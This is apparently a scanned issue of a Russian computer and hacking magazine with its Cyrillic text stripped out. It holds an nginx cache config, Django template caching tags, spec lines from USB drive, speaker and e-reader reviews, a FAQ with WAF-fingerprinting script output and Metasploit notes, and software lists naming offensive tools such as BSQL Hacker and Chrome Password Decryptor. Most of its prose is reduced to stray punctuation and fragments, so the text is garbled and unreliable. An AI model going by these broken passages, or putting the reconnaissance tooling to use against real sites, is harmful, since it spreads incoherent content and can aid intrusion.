proxy_set_header Host $host;
proxy_store on;
proxy_store_access user:rw group:rw all:r;
proxy_temp_path /var/www/cache/;
root /var/www/cache/;
}

/var/www/cache ( tmpfs,
),
( 10 ):
$ cd /var/www/cache
$ find ./ -type f -amin +10 -delete

uWSGI Django

-, . ,

load ( ):
{% load cache %}

cache :
{% block header %}
{% cache 5000 header-cache %}
{% block logo %}
{% endblock %}
{% block menu %}
{% endblock %}
{% endcache %}
{% endblock %}

. header logo
menu, cache. , logo menu
, 5000 , .
cache , .
,
-
(,
, . .), , , .
:
{% block sidebar %}
{% cache 500 sidebar-cache request.user.username %}
...
{% endcache %}
{% endblock %}

Django- , .
.
. z

cron.


FERRUM

!

USB 3.0


, . -
( ).
,
- . , ,
,
( .
). , ,
, ,
.
, , , , -.
6 .



.
HD Tune Pro , HDD
. ,
, .

HDD PCMark Vantage. , ,
.
, / , ,

. , -
, , , .


ADATA NH13

ADATA. ADATA
NH13 750 , :
500/750 .
,
, HDD,
.
, Mini
USB 3.0.
,
,
. ,
:
USB 3.0 .
ADATA NH13 ,
.
HDD ( DVD c Windows 7),
.

3000
.

SEAGATE
STAA1500100
5000
.


Seagate . ,
- ,
- . , GoFlex
SATA-, SATA.
- ,
, , USB , eSATA
FireWire 800. Seagate STAA1500100 USB 3.0. , ,
.
Seagate STAA1500100
.
, 1,5
. ,

.


SILICON POWER
SP750GBPHDS20S3U
Silicon Power,
. HDD .

. ,
. Mini USB 3.0 ,
, .
750 , 500
1000 . : , ,
, Silicon Power SP640GBPHDS10S3N. -
: ,
. ,
, , , ,
.

2700
.

TRANSCEND TS1TSJ25H3P
, ,
. , ,
.
Transcend ,
,
.
, .
: USB 3.0,
. -
. ,
1 , Transcend TS1TSJ25H3P. ,
(500 750 ), , , .

3600
.

ADATA NH13: 750; 2,5"; USB 3.0; 77 16 118; 165
Seagate STAA1500100: 1,5; 2,5"; USB 3.0; 89 120 22; 280
Silicon Power SP750GBPHDS20S3U: 750; 2,5"; USB 3.0; 80 21 142; 160


VERBATIM 53035

- Verbatim 53035. ,
StorenGo . , , , . ,
. , Verbatim
53035 , HDD. , ,
Mini USB 3.0. ,
1 ,
.
,
Verbatim 53035
.
:
Nero, Green Button,
. ,
.
, , .

3800
.

WESTERN DIGITAL
WDBACX0010BBK
,
. My Passport
Essential SE ,
: , , . ,
, , .
: , Mini USB 3.0
. My Passport Essential SE
, 750 .
-
, ,
2,5- HDD. 1000 , . ,
. ,
. ,
.

3500
.

AWARDS
Transcend TS1TSJ25H3P: 1; 2,5"; USB 3.0; 81 22 131; 256
Verbatim 53035: 1; 2,5"; USB 3.0; 82 20 127; 185
Western Digital WDBACX0010BBK: 1; 2,5"; USB 3.0; 83 18 110; 200

, ,
.

, ,
, . ,
, , Verbatim 53035. ,
, Silicon Power SP750GBPHDS20S3U. z


[Charts: PCMark Vantage (overall result and per-test results), HD Tune Pro (Write) and HD Tune Pro (Read) for ADATA NH13 750, Seagate STAA1500100, Silicon Power SP750GBPHDS20S3U, Transcend TS1TSJ25H3P, Verbatim 53035 and Western Digital WDBACX0010BBK. PCMark Vantage tests shown: Windows Defender, Gaming, Importing pictures to Windows Photo Gallery, Windows Vista startup, Video editing using Windows Movie Maker, Windows Media Center, Adding music to Windows Media Player, Application loading.]


FERRUM

:
: RMS 25 + 25
(THD + N = 10 %)
-: > 85
: < 0,05 %
: 20 ~ 20
: 700 100
: , , FM,
: 5,75 (148 ),
, 6 ,
: 1 (25 ),
, , 6
: : 318 191 x 284 ;
: 318 186 271
: RCA- (RCA-RCA RCA
AUX), FM-, SD-, USB-
: 11

4800
.

EDIFIER R2500
2.0

Edifier, 2.0
R2500 ( Studio 5)
, . , , ,
. , , ?
, Edifier R2500

. - , .
Edifier R2500 MDF
.
.
,
5,75- -
- .
. Edifier R2500
,
.
.


.
Edifier R2500 .
( , , FM-),
USB- SD-. Edifier
R2500 MP3 WMA.

. .
.
RCA- (RCA-RCA RCA AUX),
FM-. Edifier
R2500 .

50 , -
5,75- -.
6 .

, , .
, Edifier R2500
.
! ,
. . .
, Edifier R2500
.
, ,
.

. , ,

2.1 5.1. ,

.
, Edifier R2500, ! z


FERRUM

WEXLER.BOOK
T7055
, ,


, ,
.
,
, - .
WEXLER.BOOK T7055 , .

: ,
,
WEXLER.BOOK T7055 ,

-. !
, ,
,
,
. , , ,
, , WEXLER.BOOK T7055.
: !
, ,
, ,
,
,
. ,
.

,
.
TFT-
.
WEXLER.BOOK T7055 G-,


:
: , , 7, LED
: 8
: microSD, 32
: ANSI, Unicode, TXT, PDF,
HTML, PDB, EPUB, FB2, DJVU, DOC
: MP3, WMA, FLAC, AAC, WAV,
OGG
: JPG, BMP, GIF
: WMV, RM, AVI, RMVB, 3GP, FLV,
MP4, DAT, VOB, MPG, MPEG, MKV, MOV
: FM-
: 190 x 125 x 11,5
: 315


+
+

3500
.

,
.


,
microSD 32 .
, , ,
,
. FM-
.

, WEXLER.BOOK T7055 .
.
.
.
,

.
microSD
. , WEXLER.BOOK T7055 . , ,
FM-. z


UNITS / FAQ UNITED

(twitter.com/stepah)

FAQ United

FAQ@REAL.XAKEP.RU

DROPBOX.COM.
,

?
!


4,5
- . Dropbox.com

. ,
,


.
, 500

Dropbox 500
.
Dropbox,

(bit.ly/AEhbvD). , AutoPlay (,
, )
Dropbox. Windows 7
Control Panel Hardware and Sound
Autoplay, XP
.

,
Q WAF
( -)?

! WAF
, .
,
, ,
WAF. , impervadetect (code.google.com/p/imperva-detect)

Imperva WAF:

# ./imperva-detect.sh https://www.example.com
Testing [https://www.example.com] for presence of application firewall --
Test 0 - Good User Agent...
/ application firewall possibly present
Test 1 - Web Leech User Agent...
/ application firewall possibly present
Test 2 - E-mail Collector Robot User
/ application firewall possibly present
Test 3 - BlueCoat Proxy Manipulation
/ application firewall possibly present
Test 4 - Web Worm Blocking...
/ application firewall not detected
Test 5 - XSS Blocking...
/ application firewall possibly present
--- Tests Finished on [https://www.example.com]
4 out of 5 tests indicate Imperva application firewall present ---

WAFW00F
(code.google.com/p/waffit),
WAF.
, SVN.


,
,
MAC-?


! MAC-

Google
Location Services (samy.pl/mapxss) Skyhook
(www.skyhookwireless.com). ,

. ,
MAC-,

,
. ,

,
Google
,

Wi-Fi.

- 15
-

.
HTML5.

. ,
UI-.


Twitter
UI Bootstrap (twitter.github.com/bootstrap). ( )


( IE7).

.
, , .
Bootstrap
,
. Bootstrap ,
940-.


? ,

?

.

Binwalk (code.google.com/p/binwalk).

,

.
, , firmware,
Linux, , . .


-.

- .
.
,


. ?



MYSQL?

Comet.
, Comet
,

( )
.

- : Comet
-
(bit.ly/yZ7OtH). Comet-, -

,
show processlist.
processlist
information_schema,
SQL-:

mysql -u root -p -BNe "select host,count(host) from processlist group by host;" information_schema

Dklab_Realplexor (dklab.ru/lib/dklab_realplexor) Socket.IO (socket.io). Dklab_Realplexor
,
(
PHP Python), Socket.IO LEGO
mindshtorms
API
.
Comet-
push-,
-
, .
: Pusher (pusher.Comet), Pubnub
(www.pubnub.com), Partcl (code.google.com/p/partcl), BeaconPush (beaconpush.com), X-Stream.ly (x-stream.ly) ioBridge
(iobridge.com).
(bit.ly/yLJcqm).


MSF?

Metasploit Framework
,
,

. ,

<Ctrl + C>,

. ,
MSF , ,
, ,
,
.

. ! - , !
MSF



, Twitter.
, , . ,
Bootstrap.
.


Pusher -,

Bootstrap ,
jQuery-. ,

, .
12
jQuery-,
, ..

BootStrap
,
, ,

, .
,
, -, . .



spool /root/owned_info.txt.
/root/owned_info.txt MSF .
, , spool (
). , , .

spool off.
-.
Q -

,
. GREP
:).

glogg (glogg.bonnefon.org).

--- .
,
grep less.

-
WINDOWS,
. -

, ,
?

,
. ,

, :

.
Windows Event Viewer Plus
(http://bit.ly/znh9fS) Windows 8 Log Collector
(http://bit.ly/wyDI0m).

,

.

,

.



.
-,
. -

?

,
SMS;
;
, Android API;
broadcast-;
SMS .
Windows- . ,
.
.
?

USB-,

.
,
X Y
.
Arduino.
webaff (bit.ly/zNDkpD).

, ,
-,
, -,
.
Knas Restarter (www.knas.se). , , , Knas
Restarter ,
.
.


,


,
.
?

.

,
,

,
. ,

?

Android! DroidBox
(code.google.com/p/droidbox),
.
:
;
/ ;
;
, DexClassLoader;


Evalaze (www.evalaze.de). ?
.
.

, ,

!


.

-

,
GOOGLE DOCS,
?

Joukuu
(www.joukuu.com). Joukuu
(
Dropbox, Google Docs Box.net),
- ,
. ,
Google Docs Microsoft Office
,

Google. z

Windows-


>Net
Alpine 2.0
AthTek NetWalk Home Edition
Bluetooth Stack Switcher 1.1
DreamMail 4.6.9.0
eToolz 3.4.8
FTP Scheduler
MetroTwit
NeoDownloader 2.9
RaidCall 6.0.8
RealVNC 4.1

>Multimedia
Caesium 1.4.1
Color Desker
Free Audio Editor 2011
Free Video Dub 2.0.3
ImageGlass 1.4
IOGraph 0.9
Joukuu 1.1.5
KooBits 4.0
Little Piano 1.0.1
Motion Man
MuseScore 1.1
MusicBee 1.3.4334
Scan Tailor 0.9.11
Stealth Player 1.0
view3dscene 3.11.0
Windows 7 Logon Screen
Tweaker 1.5

>Misc
Apple Wireless Keyboard
Autosensitivity 1.4
BabyPDF 1.0
Ditto 3.18.24
Duplicate Commander 2.2
ISO Workshop 2.1
Lion UX Pack 1.0
MadAppLauncher 1.1
NexusFile 5.3.1
Pokki
Process Blocker 0.7 beta
RED 2.2
TaggedFrog 1.1
UndoClose 1.1
Volume Concierge

>>WINDOWS
>Development
ASMTool 1.3.1BETA
BinVis
Box2DFlash 2.1a
FlashDevelop 4.0.1
Geany 0.21
haXe 2.08
LINQPad 4.31
MongoDB 2.0.2
PluThon 2.0.0
ReSharper 6.1
Selenium IDE 1.6.0
SQLite 3.7.10
Unique 0.25
Visual Paradigm for UML 8.3
Community Edition
WebStorm 3.0.1
Zend Studio 9

>>UNIX
>Desktop
Asunder 2.1
Cinnamon 1.1.3
Clementine 1.0.0
Converseen 0.4.8
Echinus 0.4.9
Eina 0.14.0
Hugin 2011.4.0

>System
Auslogics Disk Defrag 3.3.0.2
DataGrab 1.2.3
Defraggler 2.09.391
DFIncBackup 2.98
Evalaze 1.1
History Viewer 4.8
Knas Restarter 2.0
MyDefrag 4.3.1
P-Apps 1.0
Puran Defrag 7.3
Speed Up Shutdown
UltraDefrag 5.0.2
USB Image Tool 1.58
Windows 8 Log Collector 1.0.0.6

>Security
Anti-Reversing Framework v1.1
BSQL Hacker 0.9.0.9
Chrome Password Decryptor 3.5
CodeReload
DAVTest 1.0
DbgCb
Deblaze 0.3
DroidBox
ExploitMyUnion 2.1
Fiddler 2.3.8.5
FindBugs 2.0.0
FiveBelow
grinder
Hexjector 1.0.7.4
HstEx 3.7
JavaSnoop 1.1
loadbalancer-finder 0.5.1
loadbalancer-finder v0.5.1
Mandiant Redline 1.0.3
RainbowCrack 1.5
Redline 1.0.3
RIPS 0.51
Scrapy 0.14
Scylla Imports Reconstruction
0.5a
Sessionthief
Sikuli-X 1.0rc3
SnD Reverser Tool 1.4
sslyze 0.3
VERA 0.3
WinTaylor 2.5.1

SecurityKiss 0.2.2
Seesmic 0.8.1
ST Proxy Switcher
streamWriter 3.6
TunnelBear
TweetDeck
WeFi 4.0.1.0

>Security
binwalk v0.4.1
BoNeSi 0.2.0
crackerpassword 1.2.1
DroidBox
FindBugs 2.0.0
Fwknop Port Knocking Utility
2.0rc5
grinder
ipt_pkd 1.10
LFI Fuzzploit Tool
loadbalancer-finder v0.5.1
NETZOB 0.3.1

>Net
Blogilo 1.0
EiskaltDC++ 2.2.5
Firefox 9.0.1
FreeRDP 1.0.0
LAN Messenger 1.2.16
LeechCraf 0.4.95-578
Masqmail 0.3.4
NTM 1.3.1
ownCloud 2.0.1
PirateWall 0.2.1
pyLoad 0.4.9
QupZilla 1.1.0
RSSOwl 2.1.2
SquidAnalyzer 4.2
Super Flexible File Synchronizer
5.61
Tixati 1.82
Window Switch 0.12.9
ZMail 0.7

>Devel
ART 0.9.01
Controlled Vars 1.3.1
Eric 5.1.8
Freeglut 2.8.0
FreePascal 2.6.0
Gambas3 3.0.0
GNU Octave 3.6.0
GTK 3.3.10
Jython 2.5.2
LatencyTOP 0.5
libircclient 1.6
mxGraph 1.9.0.2
NetBeans 7.1
PHP 5.3.9
ProjectOr RIA 1.9.1
Reportico 2.3.1
Rudiments 0.35
Ultimix 1.5.177
wxPython 2.9.3.1

ISO Master 1.3.9


LibreCAD 1.0.0
LibreOffice 3.4.5
Rhythmbox 2.95
RunLens 0.02
Scribus 1.4.0
slowmoVideo 0.2.5
SMPlayer 0.6.10
SyncWall 1.1.0
tvpvrd 3.3.4
Xine-lib 1.2.0

>>MAC
Adium 1.4.4
birthdayBook 6.0.6
Boxer 1.2.1
Cappuccino 1.11
fp 5.1
iFileX 1.1.1
iTweaX 3.0.2
LimeChat 2.30
MediaTube 1.0
Permanent Eraser 2.5.3
Praat 5.3.04
Raidcall 2.0
ShadowKiller 1.3
Skim 1.3.19
Sonora
SpeedTao beta1
TftpServer 3.4.1
Tunnelblick 3.2.3

>X-distr
PC-BSD 9.0

>System
Calculate-assemble 2.2.27
Coreutils 8.15
fstransform 0.3.7
Ipt-netflow 1.7.1
LCMC 1.2.0
Linux 3.2.2
Loadbars 0.4.0
oobash 0.39.1
OpenNebula 3.2.0
OpenNMS 1.8.17-1
Parallel 20120122
Raider 0.9.2
rxvt-unicode 9.15
systemd v38
Usermin 1.580

>Server
Apache 2.2.21
Asterisk 10.1.0
BIND 9.8.1-p1
CUPS 1.5.0
Dhcp 4.2.3-p2
Dovecot 2.0.17
FreeRADIUS 2.1.12
lighttpd 1.4.30
MySQL 5.5.20
NSD 3.2.9
OpenLDAP 2.4.28
OpenVPN 2.2.2
Postfix 2.8.7
PostgreSQL 9.1.2

OpenSSL 1.0.0g
RainbowCrack 1.5
Scapy 2.1.0
Scrapy 0.14
Social Engineer Toolkit v2.5
Spamdyke 4.3.1
Sshguard 1.5
sslyze 0.3
Stegnate 0.0.1
xca 0.9.1


UNITS / WWW2

WWW2
IFTTT
ifttt.com
IFTTT: if this, then that
, . ,
-: Gmail, Dropbox, Evernote, Instapaper, Facebook,
Twitter, Instagram, Foursquare . , : Facebook, . :
, SMS. -
, . Gmail
- , Evernote. RSS, e-mail. .
-

DUCKDUCKGO

duckduckgo.com
, . 2008
. -, DuckDuckGo
, . -, ,
. -, goodies, z (
..). DuckDuckGo
( , ).

nazamok.com
, .
. JavaScript IFrame . . , , -
.
,
nazamok.com. , -
150 ,
. , e-mail.

www.hacking-lab.com
.
, , . .
OWASP Hacking-Lab.
( LiveCD VirtualBox), VPN- , . ,
, . .
